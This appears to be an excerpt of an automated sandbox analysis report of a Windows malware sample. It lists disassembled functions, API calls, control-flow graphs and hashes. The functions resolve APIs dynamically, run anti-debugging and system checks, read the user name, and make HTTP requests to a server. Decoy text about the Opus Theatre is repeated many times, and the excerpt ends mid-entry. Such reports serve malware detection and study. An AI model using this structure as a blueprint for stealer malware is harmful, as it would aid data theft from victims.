                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                            • API String ID: 2127927946-2218711628
                                            • Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                            • Instruction ID: 994efd3a0b10ceab7f5143b43c992d696de16e9dedea517f3aaaefbefb2e1973
                                            • Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                            • Instruction Fuzzy Hash: F0413F79740624ABD7109FE5FC4DADCBF70AB4C702BA08061F90A99190C7F993859B7D
                                            Function 004048D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 769 4048d0-404992 call 41aab0 call 404800 call 41aa50 * 5 InternetOpenA StrCmpCA 784 404994 769->784 785 40499b-40499f 769->785 784->785 786 4049a5-404b1d call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 2 InternetConnectA 785->786 787 404f1b-404f43 InternetCloseHandle call 41ade0 call 40a210 785->787 786->787 873 404b23-404b27 786->873 797 404f82-404ff2 call 418b20 * 2 call 41aab0 call 41ab10 * 8 787->797 798 404f45-404f7d call 41ab30 call 41acc0 call 41abb0 call 41ab10 787->798 798->797 874 404b35 873->874 875 404b29-404b33 873->875 876 404b3f-404b72 HttpOpenRequestA 874->876 875->876 877 404b78-404e78 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41aa50 call 41ac30 * 2 call 41abb0 call 41ab10 * 2 call 41ade0 lstrlenA call 41ade0 * 2 lstrlenA call 41ade0 HttpSendRequestA 876->877 878 404f0e-404f15 InternetCloseHandle 876->878 989 404e82-404eac InternetReadFile 877->989 878->787 990 404eb7-404f09 InternetCloseHandle call 41ab10 989->990 991 404eae-404eb5 989->991 990->878 991->990 992 404eb9-404ef7 call 41acc0 call 41abb0 call 41ab10 991->992 992->989
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                              • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
                                            • StrCmpCA.SHLWAPI(?,009D1ED0), ref: 0040498A
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,",00000000,?,009D1EE0), ref: 00404E38
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
                                            • InternetCloseHandle.WININET(00000000), ref: 00404EFD
                                            • InternetCloseHandle.WININET(00000000), ref: 00404F15
                                            • HttpOpenRequestA.WININET(00000000,009D1E40,?,009D1218,00000000,00000000,00400100,00000000), ref: 00404B65
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • InternetCloseHandle.WININET(00000000), ref: 00404F1F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                            • String ID: "$"$------$------$------
                                            • API String ID: 2402878923-2180234286
                                            • Opcode ID: 927139e4ff79dcccf89a947fe60bb3502d149b71191b8262adec89c01fc198ea
                                            • Instruction ID: 9047d27655e640063cf5e546897bb6ee72beef818384a457e6eae52f2661673c
                                            • Opcode Fuzzy Hash: 927139e4ff79dcccf89a947fe60bb3502d149b71191b8262adec89c01fc198ea
                                            • Instruction Fuzzy Hash: 41121072A121189ACB14EB91DD66FEEB379AF14314F50419EF10662091EF383F98CF69
                                            Function 004179E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocNameProcessUser
                                            • String ID:
                                            • API String ID: 1206570057-0
                                            • Opcode ID: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                            • Instruction ID: 9b82aaaa51ecd1631f431d3f1c3dae0ecd6dc6cababe86b84151973db8bb3773
                                            • Opcode Fuzzy Hash: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                            • Instruction Fuzzy Hash: 80F04FB1D49249EBC700DF98DD45BAEBBB8EB45711F10021BF615A2680D7755640CBA1
                                            Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                            • ExitProcess.KERNEL32 ref: 0040117E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitInfoProcessSystem
                                            • String ID:
                                            • API String ID: 752954902-0
                                            • Opcode ID: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                            • Instruction ID: 7de8415141d8ede1392e5156f4839a36e98c975bb62c62673ce2cce929d499c4
                                            • Opcode Fuzzy Hash: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                            • Instruction Fuzzy Hash: 9ED05E74D0530DABCB04DFE09D496DDBB79BB0C315F041656DD0572240EA305441CA66
                                            Function 00419BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 665 419bb0-419bc4 call 419aa0 668 419de3-419e42 LoadLibraryA * 5 665->668 669 419bca-419dde call 419ad0 GetProcAddress * 21 665->669 671 419e44-419e58 GetProcAddress 668->671 672 419e5d-419e64 668->672 669->668 671->672 674 419e96-419e9d 672->674 675 419e66-419e91 GetProcAddress * 2 672->675 676 419eb8-419ebf 674->676 677 419e9f-419eb3 GetProcAddress 674->677 675->674 678 419ec1-419ed4 GetProcAddress 676->678 679 419ed9-419ee0 676->679 677->676 678->679 680 419f11-419f12 679->680 681 419ee2-419f0c GetProcAddress * 2 679->681 681->680
                                            APIs
                                            • GetProcAddress.KERNEL32(74DD0000,009C2798), ref: 00419BF1
                                            • GetProcAddress.KERNEL32(74DD0000,009C27C8), ref: 00419C0A
                                            • GetProcAddress.KERNEL32(74DD0000,009C2A20), ref: 00419C22
                                            • GetProcAddress.KERNEL32(74DD0000,009C2A08), ref: 00419C3A
                                            • GetProcAddress.KERNEL32(74DD0000,009C2990), ref: 00419C53
                                            • GetProcAddress.KERNEL32(74DD0000,009C93C0), ref: 00419C6B
                                            • GetProcAddress.KERNEL32(74DD0000,009C61B8), ref: 00419C83
                                            • GetProcAddress.KERNEL32(74DD0000,009C6258), ref: 00419C9C
                                            • GetProcAddress.KERNEL32(74DD0000,009C2A38), ref: 00419CB4
                                            • GetProcAddress.KERNEL32(74DD0000,009C2A50), ref: 00419CCC
                                            • GetProcAddress.KERNEL32(74DD0000,009C29A8), ref: 00419CE5
                                            • GetProcAddress.KERNEL32(74DD0000,009C29C0), ref: 00419CFD
                                            • GetProcAddress.KERNEL32(74DD0000,009C6418), ref: 00419D15
                                            • GetProcAddress.KERNEL32(74DD0000,009C29D8), ref: 00419D2E
                                            • GetProcAddress.KERNEL32(74DD0000,009C29F0), ref: 00419D46
                                            • GetProcAddress.KERNEL32(74DD0000,009C6378), ref: 00419D5E
                                            • GetProcAddress.KERNEL32(74DD0000,009C98A0), ref: 00419D77
                                            • GetProcAddress.KERNEL32(74DD0000,009C9870), ref: 00419D8F
                                            • GetProcAddress.KERNEL32(74DD0000,009C6178), ref: 00419DA7
                                            • GetProcAddress.KERNEL32(74DD0000,009C9948), ref: 00419DC0
                                            • GetProcAddress.KERNEL32(74DD0000,009C6198), ref: 00419DD8
                                            • LoadLibraryA.KERNEL32(009C9A98,?,00416CA0), ref: 00419DEA
                                            • LoadLibraryA.KERNEL32(009C9900,?,00416CA0), ref: 00419DFB
                                            • LoadLibraryA.KERNEL32(009C9918,?,00416CA0), ref: 00419E0D
                                            • LoadLibraryA.KERNEL32(009C9828,?,00416CA0), ref: 00419E1F
                                            • LoadLibraryA.KERNEL32(009C99C0,?,00416CA0), ref: 00419E30
                                            • GetProcAddress.KERNEL32(75A70000,009C97C8), ref: 00419E52
                                            • GetProcAddress.KERNEL32(75290000,009C97F8), ref: 00419E73
                                            • GetProcAddress.KERNEL32(75290000,009C9AB0), ref: 00419E8B
                                            • GetProcAddress.KERNEL32(75BD0000,009C9A20), ref: 00419EAD
                                            • GetProcAddress.KERNEL32(75450000,009C6358), ref: 00419ECE
                                            • GetProcAddress.KERNEL32(76E90000,009C94C0), ref: 00419EEF
                                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419F06
                                            Strings
                                            • NtQueryInformationProcess, xrefs: 00419EFA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: NtQueryInformationProcess
                                            • API String ID: 2238633743-2781105232
                                            • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                            • Instruction ID: 85c76ffc39373860cb8090e471c59d53cf6ad49422061259caa86ebb7f60cad9
                                            • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                            • Instruction Fuzzy Hash: 4DA16FB5D0A2549FC344DFA8FC889567BBBA74D301708A61BF909C3674E734AA40CF62
                                            Function 004062D0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191networkfileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1001 4062d0-40635b call 41aab0 call 404800 call 41aa50 InternetOpenA StrCmpCA 1008 406364-406368 1001->1008 1009 40635d 1001->1009 1010 406559-406575 call 41aab0 call 41ab10 * 2 1008->1010 1011 40636e-406392 InternetConnectA 1008->1011 1009->1008 1029 406578-40657d 1010->1029 1012 406398-40639c 1011->1012 1013 40654f-406553 InternetCloseHandle 1011->1013 1016 4063aa 1012->1016 1017 40639e-4063a8 1012->1017 1013->1010 1019 4063b4-4063e2 HttpOpenRequestA 1016->1019 1017->1019 1021 406545-406549 InternetCloseHandle 1019->1021 1022 4063e8-4063ec 1019->1022 1021->1013 1024 406415-406455 HttpSendRequestA HttpQueryInfoA 1022->1024 1025 4063ee-40640f InternetSetOptionA 1022->1025 1027 406457-406477 call 41aa50 call 41ab10 * 2 1024->1027 1028 40647c-40649b call 418ad0 1024->1028 1025->1024 1027->1029 1035 406519-406539 call 41aa50 call 41ab10 * 2 1028->1035 1036 40649d-4064a4 1028->1036 1035->1029 1039 4064a6-4064d0 InternetReadFile 1036->1039 1040 406517-40653f InternetCloseHandle 1036->1040 1044 4064d2-4064d9 1039->1044 1045 4064db 1039->1045 1040->1021 1044->1045 1048 4064dd-406515 call 41acc0 call 41abb0 call 41ab10 1044->1048 1045->1040 1048->1039
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                              • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                            • StrCmpCA.SHLWAPI(?,009D1ED0), ref: 00406353
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                            • HttpOpenRequestA.WININET(00000000,GET,?,009D1218,00000000,00000000,00400100,00000000), ref: 004063D5
                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
                                            • InternetCloseHandle.WININET(00000000), ref: 0040653F
                                            • InternetCloseHandle.WININET(00000000), ref: 00406549
                                            • InternetCloseHandle.WININET(00000000), ref: 00406553
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                            • String ID: ERROR$ERROR$FUA$GET
                                            • API String ID: 3074848878-1334267432
                                            • Opcode ID: f3f7255e0d2dc24356a6d92e3ef249651165f71d209c9760ff987d984a1e72ad
                                            • Instruction ID: e13f8b4f5a4983f25bfc964ce73e77e76ffbf3c7ad5d81db2c216f4c68459c1c
                                            • Opcode Fuzzy Hash: f3f7255e0d2dc24356a6d92e3ef249651165f71d209c9760ff987d984a1e72ad
                                            • Instruction Fuzzy Hash: 33718171A00218ABDB14DF90DC59FEEB775AF44304F1081AAF6067B1D4DBB86A84CF59
                                            Function 004119F0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
